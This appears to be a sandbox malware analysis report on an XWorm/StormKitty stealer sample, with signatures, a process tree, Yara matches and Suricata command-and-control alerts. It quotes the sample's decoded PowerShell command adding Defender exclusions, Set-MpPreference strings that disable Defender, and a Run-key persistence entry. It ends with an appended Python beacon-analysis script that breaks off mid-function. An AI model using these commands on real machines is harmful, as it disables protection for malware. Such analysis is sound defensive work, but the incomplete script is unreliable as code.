Windows Analysis Report
b39wW3jYKO.exe

Overview

General Information

Sample name: b39wW3jYKO.exe (renamed because the original name is a hash value)
Original sample name: 1b99f0bf9216a89b8320e63cbd18a292.exe
Analysis ID: 1535423
MD5: 1b99f0bf9216a89b8320e63cbd18a292
SHA1: 6a199cb43cb4f808183918ddb6eadc760f7cb680
SHA256: 5275e3db6276e5f0b85eff0c7b0282f56268646766b1566ba8f797e6ba2a9357
Tags: 64, exe, trojan

Detection

StormKitty, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected BrowserPasswordDump
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Drops PE files to the document folder of the user
Encrypted powershell cmdline option found
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Powershell with Base64
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • b39wW3jYKO.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\b39wW3jYKO.exe" MD5: 1B99F0BF9216A89B8320E63CBD18A292)
    • powershell.exe (PID: 736 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAEQAZQBzAGsAdABvAHAAXABiADMAOQB3AFcAMwBqAFkASwBPAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAYgAzADkAdwBXADMAagBZAEsATwAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGUAbgBnAGkAbgBlAGUAcgBcAGQAbwBjAHUAbQBlAG4AdABzAFwATwBuAGUARAByAGkAdgBlAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABkAG8AYwB1AG0AZQBuAHQAcwBcAE8AbgBlAEQAcgBpAHYAZQAuAGUAeABlAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      (the -enc argument is UTF-16LE text encoded as base64; it decodes to: Add-MpPreference -ExclusionPath C:\Users\engineer\Desktop\b39wW3jYKO.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\Desktop\b39wW3jYKO.exe;Add-MpPreference -ExclusionPath C:\Users\engineer\documents\OneDrive.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\documents\OneDrive.exe. The four Defender exclusions cover the sample on the Desktop and its persistence copy in Documents.)
      • conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3000 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • arndry.exe (PID: 3804 cmdline: "C:\Users\user\AppData\Local\Temp\arndry.exe" MD5: 34FB99630BAB94B3CBF92C1C6DEC493F)
      • WerFault.exe (PID: 1468 cmdline: C:\Windows\system32\WerFault.exe -u -p 3804 -s 1632 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • OneDrive.exe (PID: 3508 cmdline: "C:\Users\user\Documents\OneDrive.exe" MD5: 1B99F0BF9216A89B8320E63CBD18A292)
  • OneDrive.exe (PID: 1472 cmdline: "C:\Users\user\Documents\OneDrive.exe" MD5: 1B99F0BF9216A89B8320E63CBD18A292)
  • cleanup
No configs have been found
Yara matches: dropped files

Source | Rule | Description | Author
C:\Users\user\AppData\Local\Temp\arndry.exe | JoeSecurity_TelegramRecon | Yara detected Telegram Recon | Joe Security
C:\Users\user\AppData\Local\Temp\arndry.exe | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\arndry.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
C:\Users\user\AppData\Local\Temp\arndry.exe | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
C:\Users\user\AppData\Local\Temp\arndry.exe | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  Matched strings:
  • 0x923c:$s6: VirtualBox
  • 0x919a:$s8: Win32_ComputerSystem
  • 0x9d1e:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x9dbb:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x9ed0:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x987a:$cnc4: POST / HTTP/1.1
Yara matches: memory dumps

Source | Rule | Description | Author
00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000000.00000002.4647563742.000001419B000000.00000020.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown
  Matched strings:
  • 0x27108:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x2a63e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
0000000E.00000002.2657598951.0000019A3725E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(the full report lists 27 memory-dump entries; the remainder are not reproduced here)
Yara matches: unpacked PEs

Source | Rule | Description | Author
14.2.OneDrive.exe.19a3725ea98.3.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
0.2.b39wW3jYKO.exe.1419b110000.2.unpack | INDICATOR_SUSPICIOUS_DisableWinDefender | Detects executables containing artifacts associated with disabling Windows Defender | ditekSHen
  Matched strings:
  • 0x2a11:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
  • 0x2a91:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x2b16:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x4c9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x4d59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x4dd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x4fa1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x2faf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
  • 0x3067:$s2: Set-MpPreference -DisableArchiveScanning $true
  • 0x3107:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
  • 0x31a5:$s4: Set-MpPreference -DisableScriptScanning $true
  • 0x322f:$s5: Set-MpPreference -SubmitSamplesConsent 2
  • 0x329d:$s6: Set-MpPreference -MAPSReporting 0
  • 0x3315:$s7: Set-MpPreference -HighThreatDefaultAction 6
  • 0x33b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
  • 0x3441:$s9: Set-MpPreference -LowThreatDefaultAction 6
  • 0x34cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
  • 0x3622:$e2: Add-MpPreference -ExclusionPath
0.2.b39wW3jYKO.exe.1419b110000.2.raw.unpack | INDICATOR_SUSPICIOUS_DisableWinDefender | Detects executables containing artifacts associated with disabling Windows Defender | ditekSHen
  Matched strings:
  • 0x4811:$reg1: SOFTWARE\Microsoft\Windows Defender\Features
  • 0x4891:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x4916:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x6a9a:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x6b59:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x6bd9:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x6da1:$reg2: SOFTWARE\Policies\Microsoft\Windows Defender
  • 0x4daf:$s1: Set-MpPreference -SignatureDisableUpdateOnStartupWithoutuser $true
  • 0x4e67:$s2: Set-MpPreference -DisableArchiveScanning $true
  • 0x4f07:$s3: Set-MpPreference -DisableIntrusionPreventionSystem $true
  • 0x4fa5:$s4: Set-MpPreference -DisableScriptScanning $true
  • 0x502f:$s5: Set-MpPreference -SubmitSamplesConsent 2
  • 0x509d:$s6: Set-MpPreference -MAPSReporting 0
  • 0x5115:$s7: Set-MpPreference -HighThreatDefaultAction 6
  • 0x51b3:$s8: Set-MpPreference -ModerateThreatDefaultAction 6
  • 0x5241:$s9: Set-MpPreference -LowThreatDefaultAction 6
  • 0x52cb:$s10: Set-MpPreference -SevereThreatDefaultAction 6
  • 0x5422:$e2: Add-MpPreference -ExclusionPath
8.2.OneDrive.exe.12971b90000.5.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security
9.0.arndry.exe.1d0000.0.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
(the full report lists 13 unpacked-PE entries; the remainder are not reproduced here)

                        System Summary

Sigma rule hits

Source: Process started
Author: Florian Roth (Nextron Systems)
Data:
  Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <base64 payload; identical to the -enc argument shown in the process tree above>
  CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <same payload>
  CommandLine|base64offset|contains: (empty in the source)
  Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\b39wW3jYKO.exe"
  ParentImage: C:\Users\user\Desktop\b39wW3jYKO.exe
  ParentProcessId: 6412
  ParentProcessName: b39wW3jYKO.exe
  ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc <same payload>

Source: Registry Key set
Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)
Data:
  Details: C:\Users\user\documents\OneDrive.exe
  EventID: 13
  EventType: SetValue
  Image: C:\Users\user\Desktop\b39wW3jYKO.exe
  ProcessId: 6412
  TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive

Source: Process started
Author: frack113
Data: the same process-start event (powershell.exe, parent PID 6412) with the same field values as the first process-start hit above.

Source: Process started
Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
Data: the same process-start event (powershell.exe, parent PID 6412) with the same field values as the first process-start hit above; in the source the ProcessCommandLine field is cut off partway through the -enc payload.
Suricata IDS alerts (remote host to sandbox host)

Columns in the original table: Timestamp, SID, Severity, Classtype, Source IP, Source Port, Destination IP, Destination Port, Protocol. Every row in this table has the same values except the timestamp:
  SID: 2852870
  Severity: 1
  Classtype: Malware Command and Control Activity Detected
  Source: 104.219.239.116969 (the extraction ran the remote IP and port together; the page does not allow the boundary to be recovered)
  Destination: 192.168.2.6, port 49809 (sandbox host, ephemeral port)
  Protocol: TCP
All 68 alerts were raised on 2024-10-17 (UTC+02:00) at the following times:
  00:23:06.941004, 00:23:12.347752, 00:23:19.705273, 00:23:32.761969, 00:23:42.378257,
  00:23:45.595824, 00:23:53.174489, 00:24:01.249800, 00:24:06.549829, 00:24:06.612323,
  00:24:09.206233, 00:24:12.381741, 00:24:17.744448, 00:24:22.472275, 00:24:23.125089,
  00:24:24.530533, 00:24:29.469124, 00:24:29.502295, 00:24:31.377348, 00:24:35.536933,
  00:24:40.926137, 00:24:42.396798, 00:24:45.756387, 00:24:45.773329, 00:24:45.798311,
  00:24:45.802222, 00:24:45.849467, 00:24:45.958962, 00:24:52.812004, 00:25:01.103272,
  00:25:03.814749, 00:25:12.386381, 00:25:16.752956, 00:25:21.628026, 00:25:21.704476,
  00:25:21.776924, 00:25:21.788715, 00:25:24.812640, 00:25:30.748080, 00:25:32.538794,
  00:25:42.413793, 00:25:44.001796, 00:25:45.099249, 00:25:47.658123, 00:25:54.221084,
  00:25:54.320976, 00:25:54.365522, 00:25:54.455340, 00:25:54.558358, 00:25:55.060187,
  00:25:55.601741, 00:26:00.050392, 00:26:00.101835, 00:26:00.143069, 00:26:00.199346,
  00:26:00.260701, 00:26:00.351120, 00:26:06.811919, 00:26:10.493265, 00:26:12.034898,
  00:26:12.096656, 00:26:12.383469, 00:26:12.758266, 00:26:17.719099, 00:26:20.535485,
  00:26:29.032624, 00:26:42.092412, 00:26:42.382988
Suricata IDS alerts (sandbox host to remote host)

Same columns as the table above. Every row has SID 2852923, severity 1, classtype "Malware Command and Control Activity Detected", protocol TCP, source IP 192.168.2.6 and destination 104.219.239.116969 (remote IP and port run together in the extracted text, as above). The rows fall into two groups by source port, all on 2024-10-17 (UTC+02:00):

Source port 49841 (23 alerts):
  00:22:58.756750, 00:22:58.868312, 00:22:58.980482, 00:22:59.087171, 00:22:59.200778,
  00:22:59.326211, 00:22:59.431434, 00:22:59.545732, 00:22:59.649937, 00:22:59.759677,
  00:22:59.868781, 00:22:59.977484, 00:23:00.091605, 00:23:00.197078, 00:23:00.305782,
  00:23:00.585708, 00:23:00.737184, 00:23:00.854379, 00:23:00.961972, 00:23:01.071482,
  00:23:01.182029, 00:23:01.290048, 00:23:01.412724

Source port 49809 (26 alerts):
  00:23:06.942766, 00:23:19.707126, 00:23:32.764891, 00:23:45.597366, 00:23:53.177333,
  00:24:01.251151, 00:24:06.551647, 00:24:06.614057, 00:24:09.209077, 00:24:17.746690,
  00:24:22.474606, 00:24:23.133624, 00:24:24.535967, 00:24:29.473465, 00:24:29.503624,
  00:24:31.460547, 00:24:35.539250, 00:24:40.928694, 00:24:45.758473, 00:24:45.774939,
  00:24:45.799751, 00:24:45.849523, 00:24:45.902707, 00:24:45.962327, 00:24:52.829660,
  00:25:01.108741
                        2024-10-17T00:25:03.816459+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:16.756797+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:21.630224+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:21.706613+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:21.779140+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:21.790917+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:24.814452+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:30.752716+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:32.589358+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:44.004008+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:45.104691+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:47.666606+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.225880+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.323404+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.414900+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.457085+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:54.559955+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:55.065314+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:25:55.605482+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.052820+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.190850+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.200905+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.262372+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.315575+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:00.353067+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:06.813894+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:10.495422+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:12.037201+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:12.098554+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:12.764622+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:17.721563+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:20.537338+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:29.035136+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
                        2024-10-17T00:26:42.093278+020028529231Malware Command and Control Activity Detected192.168.2.649809104.219.239.116969TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-17T00:23:12.347752+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:23:42.378257+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:24:12.381741+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:24:42.396798+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:25:12.386381+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:25:42.413793+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:26:12.383469+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:26:42.382988+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-17T00:22:58.756750+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:58.868312+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:58.980482+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.087171+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.200778+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.326211+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.431434+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.545732+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.649937+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.759677+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.868781+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.977484+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:00.091605+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:00.197078+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:00.305782+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:00.585708+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:00.737184+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:00.854379+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:00.961972+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:01.071482+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:01.182029+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:01.290048+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:23:01.412724+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-17T00:24:45.571519+0200 | 2853193 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49809 | 104.219.239.11 | 6969 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-17T00:22:56.259148+0200 | 2853191 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-17T00:22:55.800953+0200 | 2853192 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49809 | 104.219.239.11 | 6969 | TCP
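The inbound SID 2852874 alerts (XWorm CnC PING Command Inbound, per the Networking section) land almost exactly 30 seconds apart, while the outbound SID 2852873 alerts arrive as a sub-second burst. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it reads alert rows written one per line as pipe-separated timestamp, SID, severity, classtype, source IP, source port, destination IP, destination port and protocol (the same columns as the tables above; the sample rows are this report's own alerts, re-laid out in that form) and measures the spacing between consecutive alerts per SID and flow, so that a fixed-period check-in stands out from a burst. The thresholds (at least three alerts, coefficient of variation at most 0.1, minimum period of one second) are assumptions chosen for illustration.

```python
"""Beacon-interval analysis over Suricata alert rows.

Added example, not code from the Joe Sandbox report. Rows are the report's own
alerts (inbound SID 2852874 and the start of the outbound SID 2852873 burst),
laid out as pipe-separated columns.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

SAMPLE_ROWS = """\
2024-10-17T00:23:12.347752+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:23:42.378257+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:24:12.381741+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:24:42.396798+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:25:12.386381+0200 | 2852874 | 1 | Malware Command and Control Activity Detected | 104.219.239.11 | 6969 | 192.168.2.6 | 49809 | TCP
2024-10-17T00:22:58.756750+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:58.868312+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:58.980482+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
2024-10-17T00:22:59.087171+0200 | 2852873 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49841 | 104.219.239.11 | 6969 | TCP
"""

FIELDS = ("timestamp", "sid", "severity", "classtype",
          "src_ip", "src_port", "dst_ip", "dst_port", "proto")


def parse_row(line):
    """Split one pipe-separated alert row into a dict; the timestamp becomes an aware datetime."""
    parts = [p.strip() for p in line.split("|")]
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} columns, got {len(parts)}: {line!r}")
    row = dict(zip(FIELDS, parts))
    # strptime's %z accepts the +0200 offset style used in the report's timestamps.
    row["timestamp"] = datetime.strptime(row["timestamp"], "%Y-%m-%dT%H:%M:%S.%f%z")
    return row


def load_rows(text):
    """Parse every non-empty line of a row dump."""
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def beacon_stats(rows, min_period=1.0, max_cv=0.1):
    """Group alerts per (SID, src, dst, dst port) and measure inter-alert spacing.

    Verdicts (thresholds are this example's assumptions):
      'beacon'       three or more alerts, near-constant spacing (std/mean <= max_cv)
                     and a period of at least min_period seconds
      'burst'        every gap shorter than min_period
      'irregular'    anything else with enough alerts to judge
      'insufficient' fewer than three alerts
    """
    groups = defaultdict(list)
    for r in rows:
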